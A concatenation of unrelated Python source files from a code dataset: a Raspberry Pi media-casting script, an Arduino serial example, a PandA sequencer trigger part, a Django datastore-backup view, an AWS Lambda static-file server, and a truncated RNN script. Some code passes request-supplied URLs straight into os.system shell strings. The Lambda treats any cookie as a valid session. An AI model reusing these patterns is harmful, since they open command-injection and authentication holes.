#Kill previous instance of OMX\n except Exception as e:\n print(e)\n except:\n raise\n\n displaysurface(ready_surf, True)\n\n\ndef launchimage(url):\n global player\n try:\n player.quit() #Kill previous instance of OMX\n except Exception as e:\n print(e)\n except:\n raise\n\n try:\n os.system(\"rm download/image\")\n if \"data:image/\" in url:\n if \"base64,\" in url:\n logger.info(\"Base64 Image Data Received\")\n data = url.split(',')[1].strip()\n pad = len(data) % 4\n data += \"=\" * pad\n b64img = base64.b64decode(data)\n imgfile = open('download/image', 'wb')\n imgfile.write(b64img)\n imgfile.close()\n else:\n logger.info(\"Url Image Data Received\")\n os.system(\"wget -O download/image \" + url)\n except Exception as e:\n print(e)\n except:\n raise\n\n displayimage(os.path.join(DIR_PATH, \"download\", \"image\"))\n\n\ndef launchvideo(url, config, sub=False):\n setState(\"2\")\n\n try:\n player.quit() #Kill previous instance of OMX\n except Exception as e:\n print(e)\n except:\n raise\n\n if config[\"new_log\"]:\n displaysurface(processing_surf, False)\n\n logger.info('Extracting source video URL...')\n out = return_full_url(url, sub=sub, slow_mode=config[\"slow_mode\"])\n\n logger.debug(\"Full video URL fetched.\")\n\n thread = threading.Thread(target=playWithOMX, args=(out, sub,),\n kwargs=dict(width=config[\"width\"], height=config[\"height\"],\n new_log=config[\"new_log\"]))\n thread.start()\n\n\ndef queuevideo(url, config, onlyqueue=False):\n logger.info('Extracting source video URL, before adding to queue...')\n\n out = return_full_url(url, sub=False, slow_mode=config[\"slow_mode\"])\n\n logger.info(\"Full video URL fetched.\")\n\n if getState() == \"0\" and not onlyqueue:\n logger.info('No video currently playing, playing video instead of \\\nadding to queue.')\n thread = threading.Thread(target=playWithOMX, args=(out, False,),\n kwargs=dict(width=config[\"width\"], height=config[\"height\"],\n new_log=config[\"new_log\"]))\n thread.start()\n else:\n if out is not None:\n with open('video.queue', 'a') as f:\n f.write(out+'\\n')\n\n\ndef return_full_url(url, sub=False, slow_mode=False):\n logger.debug(\"Parsing source url for \"+url+\" with subs :\"+str(sub))\n\n if ((url[-4:] in (\".avi\", \".mkv\", \".mp4\", \".mp3\")) or\n (sub) or (\".googlevideo.com/\" in url)):\n logger.debug('Direct video URL, no need to use youtube-dl.')\n return url\n\n ydl = youtube_dl.YoutubeDL(\n {\n 'logger': logger,\n 'noplaylist': True,\n 'ignoreerrors': True,\n }) # Ignore errors in case of error in long playlists\n with ydl: # Downloading youtub-dl infos. We just want to extract the info\n result = ydl.extract_info(url, download=False)\n\n if result is None:\n logger.error(\n \"Result is none, returning none. Cancelling following function.\")\n return None\n\n if 'entries' in result: # Can be a playlist or a list of videos\n video = result['entries'][0]\n else:\n video = result # Just a video\n\n if \"youtu\" in url:\n if slow_mode:\n for i in video['formats']:\n if i['format_id'] == \"18\":\n logger.debug(\n \"Youtube link detected, extracting url in 360p\")\n return i['url']\n else:\n logger.debug('''CASTING: Youtube link detected.\nExtracting url in maximal quality.''')\n for fid in ('22', '18', '36', '17'):\n for i in video['formats']:\n if i['format_id'] == fid:\n logger.debug(\n 'CASTING: Playing highest video quality ' +\n i['format_note'] + '(' + fid + ').'\n )\n return i['url']\n elif \"vimeo\" in url:\n if slow_mode:\n for i in video['formats']:\n if i['format_id'] == \"http-360p\":\n logger.debug(\"Vimeo link detected, extracting url in 360p\")\n return i['url']\n else:\n logger.debug(\n 'Vimeo link detected, extracting url in maximal quality.')\n return video['url']\n else:\n logger.debug('''Video not from Youtube or Vimeo.\nExtracting url in maximal quality.''')\n return video['url']\n\n\ndef playlist(url, cast_now, config):\n logger.info(\"Processing playlist.\")\n\n if cast_now:\n logger.info(\"Playing first video of playlist\")\n launchvideo(url, config) # Launch first video\n else:\n queuevideo(url, config)\n\n thread = threading.Thread(target=playlistToQueue, args=(url, config))\n thread.start()\n\n\ndef playlistToQueue(url, config):\n logger.info(\"Adding every videos from playlist to queue.\")\n ydl = youtube_dl.YoutubeDL(\n {\n 'logger': logger,\n 'extract_flat': 'in_playlist',\n 'ignoreerrors': True,\n })\n with ydl: # Downloading youtub-dl infos\n result = ydl.extract_info(url, download=False)\n for i in result['entries']:\n logger.info(\"queuing video\")\n if i != result['entries'][0]:\n queuevideo(i['url'], config)\n\n\ndef playWithOMX(url, sub, width=\"\", height=\"\", new_log=False):\n global player\n logger.info(\"Starting OMXPlayer now.\")\n\n logger.info(\"Attempting to read resolution from configuration file.\")\n\n resolution = \"\"\n\n if width or height:\n resolution = \" --win '0 0 {0} {1}'\".format(width, height)\n\n setState(\"1\")\n displaysurface(ready_surf, True)\n args = \"-b\" + resolution + \" --vol \" + str(volume) #+ \" -o alsa\"\n if sub:\n player = OMXPlayer(url, args + \" --subtitles subtitle.srt\")\n elif url is None:\n pass\n else:\n player = OMXPlayer(url, args)\n\n try:\n while not player.playback_status() == \"Stopped\": # Wait until video finished or stopped\n time.sleep(0.5)\n except Exception as e:\n print(e)\n except:\n raise\n\n if getState() != \"2\": # In case we are again in the launchvideo function\n setState(\"0\")\n with open('video.queue', 'r') as f:\n # Check if there is videos in queue\n first_line = f.readline().replace('\\n', '')\n if first_line != \"\":\n logger.info(\"Starting next video in playlist.\")\n with open('video.queue', 'r') as fin:\n data = fin.read().splitlines(True)\n with open('video.queue', 'w') as fout:\n fout.writelines(data[1:])\n thread = threading.Thread(\n target=playWithOMX, args=(first_line, False,),\n kwargs=dict(width=width, height=height,\n new_log=new_log),\n )\n thread.start()\n else:\n logger.info(\"Playlist empty, skipping.\")\n\n\ndef setState(state):\n # Write to file so it can be accessed from everywhere\n os.system(\"echo \"+state+\" > state.tmp\")\n\n\ndef getState():\n with open('state.tmp', 'r') as f:\n return f.read().replace('\\n', '')\n\n\ndef setVolume(vol):\n global volume\n if vol == \"more\":\n volume += 300\n if vol == \"less\":\n volume -= 300\n with open(os.path.join(DIR_PATH, \"volume\"), \"w\") as f:\n f.write(str(volume))\n","sub_path":"process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609251447","text":"#!/usr/bin/env python\n# Comando command protocol example\n# 2016/05/01 : Brett Graham\n#\n# This is the follow up example that shows how to control the Arduino led\n# blinking pattern by sending and receiving commands with multiple arguments\n#\n#\n# see libraries/comando/examples/commands_led_blink in the\n# comando repository for the corresponding arduino code\n#\n# for more detailed explanation, go to examples/commands_led_on_off.py\n# in to comando repository\n\nimport sys\nimport time\n\nimport pycomando\nimport serial\n\nif len(sys.argv) < 2:\n raise Exception(\"A serial port must be supplied: commands.py \")\nport = sys.argv[1]\n\nserial_port = serial.Serial(port, 9600)\n\ncom = pycomando.Comando(serial_port)\ntext = pycomando.protocols.TextProtocol(com)\ncmd = pycomando.protocols.CommandProtocol(com)\n\n\ncom.register_protocol(0, text)\ncom.register_protocol(1, cmd)\n\n\ndef print_message(msg):\n print(\"from arduino->%s\" % msg)\n\n\n# get_arg and has_arg can be repeatedly executed to grab incoming data\n# as many times as you like\ndef led_set(cmd):\n # if no data is received, raise an error\n if not cmd.has_arg():\n raise Exception(\"Invalid led_set response, missing both arg\")\n # grab the first piece of data\n v = cmd.get_arg(int)\n # print out the number\n print(\"Led on time was set to: %s ms\" % v)\n # check if the second argument is missing\n if not cmd.has_arg():\n raise Exception(\"missing the 2nd arg\")\n # if not, grab the second piece of data\n b = cmd.get_arg(int)\n # print out the number\n print(\"Led off time was set to: %s ms\" % b)\n\n\ntext.receive_message = print_message\n\ncmd.register_callback(0, led_set)\n\n\n\ntry:\n while True:\n try:\n # input as first argument\n i = int(raw_input(\n \"Please input a value for the led ontime (ms): \" ))\n # input as second argument\n b = int(raw_input(\n \"please input a value for the led offtime (ms): \"))\n # send_command iterates through the list of arguments, and\n # sends the arguments one at a time\n cmd.send_command(0, [i,b])\n\n except Exception as e:\n print(\"Invalid input: %s\" % e)\n\n time.sleep(0.1)\n try:\n while serial_port.inWaiting():\n com.handle_stream()\n except Exception as e:\n print(\"%s\" % e)\nexcept KeyboardInterrupt:\n serial_port.close()\n","sub_path":"examples/commands_led_blink.py","file_name":"commands_led_blink.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"460533429","text":"# Treat all division as float division even in python2\nfrom __future__ import division\n\nfrom annotypes import add_call_types, Anno, TYPE_CHECKING\nfrom scanpointgenerator import Point\n\nfrom malcolm.core import APartName, Block, Attribute, Context, PartRegistrar\nfrom malcolm.modules import builtin, scanning, pmac\nfrom malcolm.modules.pmac.util import all_points_joined\nfrom ..util import SequencerTable, Trigger\n\nimport numpy as np\n\nif TYPE_CHECKING:\n from typing import List, Tuple, Dict\n\n#: The SEQ.table attributes that should be present in PANDA.exports\nSEQ_TABLES = (\"seqTableA\", \"seqTableB\")\n\n#: The number of sequencer table rows\nSEQ_TABLE_ROWS = 4096\n\nwith Anno(\"Scannable name for sequencer input\"):\n APos = str\n\n# Pull re-used annotypes into our namespace in case we are subclassed\nAPartName = APartName\nAMri = builtin.parts.AMri\nAInitialVisibility = builtin.parts.AInitialVisibility\n\n# How long is a single tick if prescaler is 0\nTICK = 8e-9\n\n# How long is the smallest pulse that will travel across TTL\nMIN_PULSE = 1250 # ticks = 10us\n\n# How long the last pulse should be (50% duty cycle) to make sure we don't flip\n# to an unfilled sequencer and produce a false pulse. This should be at least\n# as long as it takes the PandA EPICS driver to see that we got the last frame\n# and disarm PCAP\nLAST_PULSE = 125000000 # ticks = 1s\n\n# Maximum repeats of a single row\nMAX_REPEATS = 4096\n\n\ndef seq_row(repeats=1, trigger=Trigger.IMMEDIATE, position=0,\n half_duration=MIN_PULSE, live=0, dead=0):\n # type: (int, str, int, int, int, int) -> List\n \"\"\"Create a 50% duty cycle pulse with phase1 having given live/dead values\n \"\"\"\n row = [repeats, trigger, position,\n # Phase1\n half_duration, live, dead, 0, 0, 0, 0,\n # Phase2\n half_duration, 0, 0, 0, 0, 0, 0]\n return row\n\n\ndef _get_blocks(context, panda_mri):\n # type: (Context, str) -> List[Block]\n \"\"\"Get panda, seqA and seqB Blocks using the given context\"\"\"\n # {part_name: export_name}\n panda = context.block_view(panda_mri)\n seq_part_names = {}\n for source, export in panda.exports.value.rows():\n if export in SEQ_TABLES:\n assert source.endswith(\".table\"), \\\n \"Expected export %s to come from SEQx.table, got %s\" % (\n export, source)\n seq_part_names[source[:-len(\".table\")]] = export\n assert tuple(sorted(seq_part_names.values())) == SEQ_TABLES, \\\n \"Expected exported attributes %s, got %s\" % (\n SEQ_TABLES, panda.exports.value.export)\n # {export_name: mri}\n seq_mris = {}\n for name, mri, _, _, _ in panda.layout.value.rows():\n if name in seq_part_names:\n export = seq_part_names[name]\n seq_mris[export] = mri\n assert sorted(seq_mris) == sorted(seq_part_names.values()), \\\n \"Couldn't find MRI for some of %s\" % (seq_part_names.values(),)\n blocks = [panda]\n blocks += [context.block_view(seq_mris[x]) for x in SEQ_TABLES]\n return blocks\n\n\ndef _what_moves_most(point, axis_mapping):\n # type: (Point, Dict[str, pmac.infos.MotorInfo]) -> Tuple[str, int, bool]\n \"\"\"Work out which axis from the given axis mapping moves most for this\n point\"\"\"\n # TODO: should use new velocity calcs when Giles has finished\n # {axis_name: abs(diff_cts)}\n diffs = {}\n # {axis_name: (compare_cts, increasing)}\n compare_increasing = {}\n for s, info in axis_mapping.items():\n compare_cts = info.in_cts(point.lower[s])\n centre_cts = info.in_cts(point.positions[s])\n diff_cts = centre_cts - compare_cts\n if diff_cts != 0:\n diffs[s] = abs(diff_cts)\n compare_increasing[s] = (compare_cts, diff_cts > 0)\n\n assert diffs, \\\n \"Can't work out a compare point for %s, maybe none of the axes \" \\\n \"connected to the PandA are moving during the scan point?\" % \\\n point.positions\n\n # Sort on abs(diff), take the biggest\n axis_name = sorted(diffs, key=diffs.get)[-1]\n compare_cts, increasing = compare_increasing[axis_name]\n return axis_name, compare_cts, increasing\n\n\ndef doing_pcomp(row_trigger_value):\n # type: (str) -> bool\n return row_trigger_value == \"Position Compare\"\n\n\nclass PandASeqTriggerPart(builtin.parts.ChildPart):\n \"\"\"Part for operating a pair of SEQ blocks in a PandA to do position\n compare at the start of each row and time based pulses within the row.\n Needs the following exports:\n\n - seqTableA: table Attribute of the first SEQ block\n - seqTableB: table Attribute of the second SEQ block\n - seqSetEnable: forceSet Method of an SRGATE that is used to gate both SEQs\n \"\"\"\n\n def __init__(self, name, mri, initial_visibility=None):\n # type: (APartName, AMri, AInitialVisibility) -> None\n super(PandASeqTriggerPart, self).__init__(\n name, mri, initial_visibility=initial_visibility, stateful=False)\n # Stored generator for positions\n self.generator = None\n # The last index we have loaded\n self.loaded_up_to = 0\n # The last scan point index of the current run\n self.scan_up_to = 0\n # If we are currently loading then block loading more points\n self.loading = False\n # The last point we loaded\n self.last_point = None\n # What is the mapping of scannable name to MotorInfo\n self.axis_mapping = {}\n # The minimum turnaround time for non-joined points\n self.min_turnaround = 0\n # The minimum time between turnaround points\n self.min_interval = 0\n # {(scannable, increasing): trigger_enum}\n self.trigger_enums = {}\n # The panda Block we will be prodding\n self.panda = None\n\n def setup(self, registrar):\n # type: (PartRegistrar) -> None\n super(PandASeqTriggerPart, self).setup(registrar)\n # Hooks\n registrar.hook(scanning.hooks.ReportStatusHook, self.on_report_status)\n registrar.hook((scanning.hooks.ConfigureHook,\n scanning.hooks.SeekHook,\n scanning.hooks.PostRunArmedHook), self.on_configure)\n registrar.hook(scanning.hooks.RunHook, self.on_run)\n\n @add_call_types\n def on_report_status(self, context):\n # type: (scanning.hooks.AContext) -> scanning.hooks.UInfos\n child = context.block_view(self.mri)\n # Work out if we need the motor controller to send start of row triggers\n # or no triggers\n if doing_pcomp(child.rowTrigger.value):\n # Doing position compare, don't need any triggers\n trigger = scanning.infos.MotionTrigger.NONE\n else:\n # Waiting for bit at the start of each row, so need this signal\n trigger = scanning.infos.MotionTrigger.ROW_GATE\n info = scanning.infos.MotionTriggerInfo(trigger)\n return info\n\n def setup_pcomp_dicts(self, seqa, seqb, axis_mapping):\n \"\"\"Setup the axis_mapping and trigger_enum dicts for position compare\"\"\"\n # type: (Block, Block, Dict[str, pmac.infos.MotorInfo]) -> None\n # Check that both sequencers are pointing to the same encoders\n seq_pos = {}\n for suff in \"abc\":\n # Something like INENC1.VAL or ZERO\n seqa_pos_inp = seqa[\"pos\" + suff].value\n seqb_pos_inp = seqb[\"pos\" + suff].value\n assert seqa_pos_inp == seqb_pos_inp, \\\n \"SeqA Pos%s = %s != SeqB Pos%s = %s\" % (\n suff, seqa_pos_inp, suff, seqb_pos_inp)\n seq_pos[seqa_pos_inp] = \"POS%s\" % suff.upper()\n\n # Fix the mres and offsets from the panda positions table\n positions_table = self.panda.positions.value\n for i, name in enumerate(positions_table.name):\n try:\n pos = seq_pos[name]\n except KeyError:\n # This is a position not connected to the seq, this is fine\n pass\n else:\n # This is a position that we can compare on, check its\n # dataset name which is the scannable name\n scannable = positions_table.datasetName[i]\n info = axis_mapping.get(scannable, None)\n if info:\n # We are asked to scan this, so correct its resolution\n # and store\n info.resolution = positions_table.scale[i]\n info.offset = positions_table.offset[i]\n self.axis_mapping[scannable] = info\n self.trigger_enums[(scannable, True)] = \\\n \"%s>=POSITION\" % pos\n self.trigger_enums[(scannable, False)] = \\\n \"%s<=POSITION\" % pos\n # Check we have at least one entry\n assert self.axis_mapping, \\\n \"None of the seq inputs %s can be mapped to scannable names \" \\\n \"in %s. Did you define datasetName entries for these rows in \" \\\n \"the PandA positions table?\" % (\n sorted(seq_pos), sorted(axis_mapping))\n\n # Allow CamelCase as these parameters will be serialized\n # noinspection PyPep8Naming\n @add_call_types\n def on_configure(self,\n context, # type: scanning.hooks.AContext\n completed_steps, # type: scanning.hooks.ACompletedSteps\n steps_to_do, # type: scanning.hooks.AStepsToDo\n part_info, # type: scanning.hooks.APartInfo\n generator, # type: scanning.hooks.AGenerator\n axesToMove # type: scanning.hooks.AAxesToMove\n ):\n # type: (...) -> None\n self.generator = generator\n self.loaded_up_to = completed_steps\n self.scan_up_to = completed_steps + steps_to_do\n self.loading = False\n self.last_point = None\n\n # Get the panda and the pmac we will be using\n child = context.block_view(self.mri)\n panda_mri = child.panda.value\n pmac_mri = child.pmac.value\n row_trigger = child.rowTrigger.value\n\n # See if there is a minimum turnaround\n infos = scanning.infos.MinTurnaroundInfo.filter_values(part_info)\n if infos:\n assert len(infos) == 1, \\\n \"Expected 0 or 1 MinTurnaroundInfos, got %d\" % len(infos)\n self.min_turnaround = max(pmac.util.MIN_TIME, infos[0].gap)\n self.min_interval = infos[0].interval\n else:\n self.min_turnaround = pmac.util.MIN_TIME\n self.min_interval = pmac.util.MIN_INTERVAL\n\n # Get panda Block, and the sequencer Blocks so we can do some checking\n self.panda, seqa, seqb = _get_blocks(context, panda_mri)\n\n # Fill in motor infos and trigger lookups\n motion_axes = pmac.util.get_motion_axes(generator, axesToMove)\n self.axis_mapping = {}\n self.trigger_enums = {}\n\n if motion_axes:\n # Need to fill in the axis mapping\n axis_mapping = pmac.util.cs_axis_mapping(\n context, context.block_view(pmac_mri).layout.value, motion_axes)\n if doing_pcomp(row_trigger):\n # We need to do position compare, so only place the infos into\n # axis_mapping that our sequencer can see\n self.setup_pcomp_dicts(seqa, seqb, axis_mapping)\n else:\n # We rely on the inputs coming into SEQ bitA\n assert seqa[\"bita\"].value == seqb[\"bita\"].value != \"ZERO\", \\\n \"SEQ.bita inputs need to point to the same non-zero input\"\n self.axis_mapping = axis_mapping\n\n # TODO:\n # Check that the sequencer blocks have the correct wiring, delays, and\n # setup monitors on the active field\n assert seqa\n assert seqb\n\n # load up the first SEQ\n self._fill_sequencer(self.panda[SEQ_TABLES[0]])\n\n def _how_long_moving_wrong_way(self, axis_name, point, increasing):\n # type: (str, Point, bool) -> float\n \"\"\"Work out the turnaround for the axis with the given MotorInfo, and\n how long it is moving in the opposite direction from where we want it to\n be going for point\"\"\"\n time_arrays, velocity_arrays = pmac.util.profile_between_points(\n self.axis_mapping, self.last_point, point, self.min_turnaround,\n self.min_interval)\n info = self.axis_mapping[axis_name]\n time_array = time_arrays[info.scannable]\n velocity_array = velocity_arrays[info.scannable]\n\n # Work backwards through the velocity array until we are going the\n # opposite way\n i = 0\n for i, v in reversed(list(enumerate(velocity_array))):\n # Divide v by resolution so it is in counts\n v /= info.resolution\n if (increasing and v <= 0) or (not increasing and v >= 0):\n # The axis is stationary or going the wrong way at this\n # point, so we should be blind before then\n assert i < len(velocity_array) - 1, \\\n \"Last point of %s is wrong direction\" % velocity_array\n break\n blind = time_array[i]\n return blind\n\n @staticmethod\n def _get_row_indices(points):\n \"\"\"Generate list of start and end indices for separate rows\n\n This excludes the initial row, which is handled separately.\n \"\"\"\n points_joined = all_points_joined(points)\n\n if points_joined is not None and len(points_joined) > 0:\n results = np.nonzero(np.invert(points_joined))[0]\n results += 1\n start_indices = results\n else:\n start_indices = np.array([])\n\n # end_index = start_index + size\n end_indices = np.empty(len(start_indices), dtype=int)\n if start_indices.size:\n end_indices[:-1] = start_indices[1:]\n end_indices[-1] = len(points)\n\n return start_indices, end_indices\n\n @staticmethod\n def _generate_immediate_rows(durations):\n \"\"\"Create a series of immediate rows from `durations`\"\"\"\n pairwise_equal = np.empty(len(durations), dtype=bool)\n pairwise_equal[0] = True # Initial duration starts first row\n\n np.not_equal(durations[:-1], durations[1:], out=pairwise_equal[1:])\n start_indices = np.nonzero(pairwise_equal)\n seq_durations = durations[start_indices]\n seq_lengths = np.diff(np.append(start_indices, len(durations)))\n\n rows = []\n for duration, count in zip(seq_durations, seq_lengths):\n half_frame = int(round(duration / TICK / 2))\n complete_rows = count // MAX_REPEATS\n remaining = count % MAX_REPEATS\n\n rows = [seq_row(repeats=MAX_REPEATS, half_duration=half_frame,\n live=1)] * complete_rows\n rows.append(seq_row(repeats=remaining, half_duration=half_frame,\n live=1))\n\n return rows\n\n def _generate_triggered_rows(self, points, start_index, end_index,\n add_blind):\n \"\"\"Generate sequencer rows corresponding to a triggered points row\"\"\"\n rows = []\n initial_point = points[start_index]\n half_frame = int(round(initial_point.duration / TICK / 2))\n\n if self.trigger_enums:\n # Position compare\n # First row, or rows not joined\n # Work out which axis moves most during this point\n axis_name, compare_cts, increasing = _what_moves_most(\n initial_point, self.axis_mapping)\n\n if add_blind:\n # How long to be blind for during the turnaround\n blind = self._how_long_moving_wrong_way(\n axis_name, initial_point, increasing)\n half_blind = int(round(blind / TICK / 2))\n rows.append(seq_row(half_duration=half_blind, dead=1))\n\n # Create a compare point for the next row\n rows.append(seq_row(\n trigger=self.trigger_enums[(axis_name, increasing)],\n position=compare_cts, half_duration=half_frame, live=1))\n else:\n # Row trigger coming in on BITA\n\n if add_blind:\n # Produce dead pulse as soon as row has finished\n rows.append(seq_row(\n half_duration=MIN_PULSE, dead=1, trigger=Trigger.BITA_0))\n\n rows.append(seq_row(\n trigger=Trigger.BITA_1, half_duration=half_frame, live=1))\n\n rows.extend(self._generate_immediate_rows(\n points.duration[start_index+1:end_index]))\n\n return rows\n\n def _fill_sequencer(self, seq_table):\n # type: (Attribute) -> None\n points = self.generator.get_points(self.loaded_up_to, self.scan_up_to)\n\n if points is None or len(points) == 0:\n table = SequencerTable.from_rows([])\n seq_table.put_value(table)\n return\n\n rows = []\n\n if not self.axis_mapping:\n # No position compare or row triggering required\n rows.extend(\n self._generate_immediate_rows(points.duration))\n\n # one last dead frame signal\n rows.append(seq_row(half_duration=LAST_PULSE, dead=1))\n\n if len(rows) > SEQ_TABLE_ROWS:\n raise Exception(\"Seq table: {} rows with {} maximum\".format(\n len(rows), SEQ_TABLE_ROWS))\n\n table = SequencerTable.from_rows(rows)\n seq_table.put_value(table)\n return\n\n start_indices, end_indices = self._get_row_indices(points)\n\n point = points[0]\n first_point_static = point.positions == point.lower == point.upper\n end = start_indices[0] if start_indices.size else len(points)\n if not first_point_static:\n # If the motors are moving during this point then\n # wait for triggers\n rows.extend(self._generate_triggered_rows(points, 0, end, False))\n else:\n # This first row should not wait, and will trigger immediately\n rows.extend(self._generate_immediate_rows(points.duration[0:end]))\n\n for start, end in zip(start_indices, end_indices):\n # First row handled outside of loop\n self.last_point = points[start-1]\n\n rows.extend(self._generate_triggered_rows(points, start, end, True))\n\n # one last dead frame signal\n rows.append(seq_row(half_duration=LAST_PULSE, dead=1))\n\n if len(rows) > SEQ_TABLE_ROWS:\n raise Exception(\"Seq table: {} rows with {} maximum\".format(\n len(rows), SEQ_TABLE_ROWS))\n\n table = SequencerTable.from_rows(rows)\n seq_table.put_value(table)\n\n @add_call_types\n def on_run(self, context):\n # type: (scanning.hooks.AContext) -> None\n # Call sequence table enable\n self.panda.seqSetEnable()\n","sub_path":"malcolm/modules/ADPandABlocks/parts/pandaseqtriggerpart.py","file_name":"pandaseqtriggerpart.py","file_ext":"py","file_size_in_byte":18950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"87789962","text":"import logging\nfrom google.appengine.api import taskqueue\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom djangae.environment import application_id\n\nfrom .utils import get_backup_setting\n\nlogger = logging.getLogger(__name__)\n\nGAE_BUILTIN_MODULE = \"ah-builtin-python-bundle\"\nBACKUP_HANDLER = \"/_ah/datastore_admin/backup.create\"\n\n\ndef create_datastore_backup(request):\n \"\"\"Creates a datastore backup based on the DS_BACKUP_X settings\n \"\"\"\n base_url = \"http://{module}-dot-{app_id}.appspot.com{backup_handler}\".format(\n module=GAE_BUILTIN_MODULE,\n app_id=application_id(),\n backup_handler=BACKUP_HANDLER\n )\n\n enabled = get_backup_setting(\"ENABLED\")\n if not enabled:\n msg = \"DS_BACKUP_ENABLED is False. Not backing up\"\n logger.info(msg)\n return HttpResponse(msg)\n\n gcs_bucket = get_backup_setting(\"GCS_BUCKET\")\n backup_name = get_backup_setting(\"NAME\")\n queue = get_backup_setting(\"QUEUE\", required=False)\n exclude_models = get_backup_setting(\"EXCLUDE_MODELS\", required=False, default=[])\n exclude_apps = get_backup_setting(\"EXCLUDE_APPS\", required=False, default=[])\n\n models = []\n for model in apps.get_models(include_auto_created=True):\n app_label = model._meta.app_label\n object_name = model._meta.object_name\n model_def = \"{}.{}\".format(app_label, object_name)\n\n if app_label in exclude_apps:\n logger.info(\n \"Not backing up {} due to {} being in DS_BACKUP_EXCLUDE_APPS\".format(\n model_def, app_label))\n continue\n\n if model_def in exclude_models:\n logger.info(\n \"Not backing up {} as it is present in DS_BACKUP_EXCLUDE_MODELS\".format(\n model_def))\n continue\n\n logger.info(\"Backing up {}\".format(model_def))\n models.append(model)\n\n if not models:\n raise Exception(\"No models to back up\")\n\n kinds = \"&kind=\".join(m._meta.db_table for m in models)\n\n backup_url = (\n \"{backup_handler}\"\n \"?name={backup_name}\"\n \"&gs_bucket_name={gcs_bucket}\"\n \"&filesystem=gs\"\n \"&kind={kinds}\"\n ).format(\n backup_handler=BACKUP_HANDLER,\n backup_name=backup_name,\n gcs_bucket=gcs_bucket,\n kinds=kinds\n )\n\n if queue:\n backup_url += \"&queue={}\".format(queue)\n\n # Backups must be started via task queue or cron.\n taskqueue.add(\n method=\"GET\",\n url=backup_url,\n target=GAE_BUILTIN_MODULE\n )\n\n return HttpResponse(\"Started backup using URL {}\".format(backup_url))\n","sub_path":"djangae/contrib/backup/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"502872870","text":"from __future__ import print_function\nimport json\nimport urllib\nimport os\nimport base64\n\nimport boto3\n\n\nprint('Loading function')\nS3_BUCKET = os.environ['S3_BUCKET']\nSTAGE = os.environ['STAGE']\nAUTH_URL = os.environ['AUTH_URL']\nURL = os.environ['URL']\n\ndef build_config():\n config = {\n \"auth_url\": AUTH_URL,\n \"url\": URL\n }\n return config\n\ndef lambda_handler(event, context):\n print(event)\n try:\n print(urllib.unquote(event['headers']['Cookie']))\n session_cookie = urllib.unquote(event['headers']['Cookie']).split('=')[1]\n print(session_cookie)\n if session_cookie == 'undefined':\n # WARNING: this is not secure. Cookie should be validated as well...TODO\n body = {\"msg\": \"No session cookie present\"}\n location = AUTH_URL\n headers = {\"Location\": location}\n response = {\n \"statusCode\": 302,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n return response\n except Exception as e:\n body = {\"msg\": \"No session cookie present\"}\n location = AUTH_URL\n headers = {\"Location\": location}\n response = {\n \"statusCode\": 302,\n \"body\": json.dumps(body),\n \"headers\": headers\n }\n return response\n\n headers = {\n \"Content-Type\": \"text/html\"\n }\n\n path = event['requestContext']['path']\n s3 = boto3.client('s3')\n s3_key = path[1:]\n print(\"S3 key: %s\" % s3_key)\n encoded = False\n\n if path == '/' or path == '':\n s3_key = \"index.html\"\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n elif path == '/config.json':\n config = build_config()\n ct = json.dumps(config)\n elif path == '/favicon.ico':\n #s3_key = 'favicon.ico'\n headers = {\n \"Content-Type\": \"image/x-icon\"\n }\n encoded = True\n ct = base64.b64encode(s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read())\n elif '.png' in path:\n #s3_key = 'favicon.png'\n headers = {\n \"Content-Type\": \"image/png\"\n }\n encoded = True\n ct = base64.b64encode(s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read())\n elif '.css' in path:\n #s3_key = event['requestContext']['path'][1:]\n headers = {\n \"Content-Type\": \"text/css\"\n }\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n elif path.endswith(\".js\"):\n headers = {\n \"Content-Type\": \"text/javascript\"\n }\n print(s3_key)\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n elif path.endswith(\".woff2\") or path.endswith(\".woff\") or path.endswith(\".ttf\"):\n headers = {\n \"Content-Type\": \"binary/octet-stream\",\n }\n encoded = True\n ct = base64.b64encode(s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read())\n else:\n print(\"ELSE: %s\" % s3_key)\n ct = s3.get_object(Bucket=S3_BUCKET, Key=s3_key)['Body'].read()\n print(s3_key)\n\n response = {\n \"statusCode\": 200,\n \"body\": ct,\n \"headers\": headers,\n \"isBase64Encoded\": encoded\n }\n return response\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"159898788","text":"\"\"\"\r\n#################################################################################\r\nThe following code contains the implementation of question 1 using LSTM\r\n Sequence length=256\r\n\r\n################################################################################\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nfrom my_rnn import RNN\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import precision_recall_curve\r\nfrom sklearn.metrics import roc_curve, roc_auc_score,auc\r\nimport warnings\r\nwarnings.simplefilter(\"ignore\", UserWarning)\r\n\r\n\r\n \r\ndef del_all_flags(FLAGS):\r\n flags_dict = FLAGS._flags() \r\n keys_list = [keys for keys in flags_dict] \r\n for keys in keys_list:\r\n FLAGS.__delattr__(keys)\r\n\r\n\r\ndef onehot_encoding(df_categorical):\r\n result=df_categorical.copy()\r\n for feature_name in result.columns:\r\n one_hot = pd.get_dummies(result[feature_name])\r\n result = result.drop(feature_name,axis = 1)\r\n result = result.join(one_hot,lsuffix='_caller', rsuffix='_other')\r\n return result\r\n\r\n\"\"\"\r\nprepare batch of training\r\n\"\"\"\r\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\r\n 